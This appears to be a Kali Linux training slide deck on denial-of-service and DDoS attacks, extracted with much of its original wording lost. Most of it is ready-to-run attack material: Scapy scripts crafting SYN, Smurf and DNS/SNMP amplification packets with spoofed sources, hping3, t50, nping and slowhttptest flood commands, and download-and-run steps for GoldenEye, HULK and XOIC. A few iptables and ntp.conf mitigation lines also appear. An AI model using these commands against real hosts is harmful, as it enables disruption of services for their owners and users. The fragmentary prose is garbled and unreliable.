DoS and DDoS Attack Techniques

This document discusses various denial of service (DoS) and distributed denial of service (DDoS) attack tools and techniques, including SYN flood, Smurf attack, Slowloris, GoldenEye, HULK, and more. It provides code snippets and instructions for executing DoS attacks using tools like Hping3, Siege, Nmap, and Scapy.


Kali Linux

The quieter you become the more you are able to hear
▪ DoS DOS
– Denial of Service

▪ DDoS


– ping

▪ Bill gates

▪ D
▪ Anonymous


– DDoS


– Guy Fawkes
– 4chan
– DDoS


– We are Anonymous. We are a Legion. We do not forgive. We do not forget. Expect us.
DoS

▪ D
– Flood
– ICMP Flood UDP Flood

▪ D

– Syn Flood Ping of Death ARP DNS 802.11 SSL

▪ D

– CC


DoS


– —>FW—> OS—>



– FW
– CPU I/O
– OS




DDoS
Syn-Flood

▪ IP

▪ Scapy
– i=IP()
– i.dst="1.1.1.1"
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst="1.1.1.1")/TCP())
Syn-Flood

▪ : ./syn_flood.py
– iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP
– netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
– windows 10
TCP state    Side (C = client, S = server)
LISTEN       S
SYN-SENT     C
SYN-RECV     S
ESTABLISHED  C/S  TCP
FIN-WAIT-1   C/S
FIN-WAIT-2   C/S
CLOSE-WAIT   C/S
CLOSING      C/S
LAST-ACK     C/S
TIME-WAIT    C/S  4
CLOSED       C/S
IP

▪ DoS
▪ IP
– IP


▪ TCP
Smurf

▪ DDoS
– ICMP echo Request ping
– LAN
– ping

▪ Scapy
– i=IP()
– i.dst="1.1.1.255"
– p=ICMP()
– p.display()
– r=(i/p)
– send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
Sockstress

▪ 2008 Jack C. Louis


▪ TCP

– socket
– ACK window 0
– CPU

– Window TCP
Sockstress

▪ Python
– ./sockstress.py 1.1.1.1 21 200

▪ C
– https://github.com/defuse/sockstress
– gcc -Wall -c sockstress.c
– gcc -pthread -o sockstress sockstress.o
– ./sockstress 1.1.1.1:80 eth0
– ./sockstress 1.1.1.1:80 eth0 -p payloads/http


– iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
Sock stress


– Netstat
– Free
– Top
Sockstress


– sockstress DoS
– TCP syn cookie

– IP TCP
▪ 30 80 10 IP
▪ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
▪ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP
▪ DDoS
TearDrop

▪ 95 98 3.x nt
– 2.x android 6.0 IOS


– IP



[Figure: Ethernet frame layout MAC | IP | DATA | FCS. IP PAYLOAD 1480 with fragment offset; IP Total Length 1500; frame 1518]
TearDrop

▪ Ping teardrop
teardrop.cap

▪ windows SMB
– teardrop_smb.py

▪ Android IOS
– teardrop_android_ios.py


DNS




▪ DNS

– dig ANY hp.com @202.106.0.20 8



– DNS DNS DDoS
DNS

▪ Scapy
– IP/UDP/DNS/DNS
i=IP()
i.dst="202.106.0.20"
i.src="1.1.1.1"
i.display()
u=UDP()
u.display()
u.dport
d=DNS()
d.rd=1
d.qdcount=1
d.display()
q=DNSQR()
q.qname='hp.com'
q.qtype=255
q.display()
d.qd=q
d.display()
r=(i/u/d)
r.display()
sr1(r)
send(r)

▪ IP DNS
SNMP


– Simple Network Management Protocol
– UDP 161 / 162
– ( manager / ) ( agent / )
– MIB

– OID
– IETF MIB / MIB




SNMP

▪ SNMP
– community
i=IP()
i.dst="1.1.1.1"
i.display()
u=UDP()
u.dport=161
u.sport=161
s=SNMP()
s.community='public'
s.display()
b=SNMPbulk()
b.display()
b.max_repetitions=100
b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
s.PDU=b
s.display()
r=(i/u/s)
r.display()
sr1(r)
NTP


– Network Time Protocol



– UDP 123


– NTP monlist MON_GETLIST
▪ NTP
– NTP 600 IP
▪ 6 IP 100 100
NTP

▪ NTP
– nmap -sU -p123 1.1.1.1 / 127.0.0.1


– ntpdc -n -c monlist 1.1.1.1
– ntpq -c rv 1.1.1.1
– ntpdc -c sysinfo 192.168.20.5


– /etc/ntp.conf
▪ restrict -4 default kod nomodify notrap nopeer noquery
▪ restrict -6 default kod nomodify notrap nopeer noquery
NTP

▪ NTP
– ntpd 4.2.7p26 monlist
– monlist
DoS



– OS



– DoS

▪ CesarFTP 0.99
– ftp_fuzz.py # MKD/RMD

▪ Ms12-020 DoS
DoS

▪ Slowhttptest google
– DoS CC
– Python Linux win Cygwin OSX
– apache tomcat


– Slowloris Slow HTTP POST
▪ Http Syn flood
▪ HTTP
DoS
▪ Slowloris http \r\n\r\n \r\n……
▪ Slow POST HTTP content-length body
DoS


– Slow Read attack
▪ slowloris and slow POST

▪ TCP window
– Apache Range Header attack
▪ HTTP Body
▪ CPU
DoS

▪ ulimit -n 70000
▪ HTTP Post
– slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3

▪ slowloris
– slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3



▪ /


▪ RUDY
– HTTP POST slowhttptest

– “ ”
– WEB
– https://sourceforge.net/projects/r-u-dead-yet/
▪ Hping3
– TCP/IP FW

▪ Syn Flood
– hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
– hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
– hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 TCP Flood

▪ ICMP Flood
– hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2

▪ UDP Flood
– hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
▪ LAND
– SYN Flood

– hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1

▪ TCP DoS
– nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1

▪ IP
– nping --echo-client "public" echo.nmap.org --udp
▪ Siege
– http/https
– siege -g http://1.1.1.1/a.php / 1.1.1.1
– siege -i -c 1000
– url -f
▪ /etc/siege/urls.txt

▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
▪ Nmap
– grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
▪ DoS
– LOIC
– HOIC
– DDoSer

▪ DoS IP
▪ XOIC
– IP
– git clone git://git.code.sf.net/p/xoic/code xoic-code
– https://xoicdoser.wordpress.com/
– test normal DoS Attack
– TCP/HTTP/UDP/ICMP
▪ HULK - Http Unbearable Load King
– Python

– WEB
– https://packetstormsecurity.com/files/download/112856/hulk.zip
▪ DDOSIM
– 7
– IP
– TCP
– DDoS
– HTTP HTTP DDoS
– SMTP DDoS
– TCP
▪ GoldenEye
– http/https
– Python
– keep-alive
– wget https://github.com/jseidl/GoldenEye/archive/master.zip
– unzip master.zip
– ./goldeneye.py http://1.1.1.1 -w 50
Thanks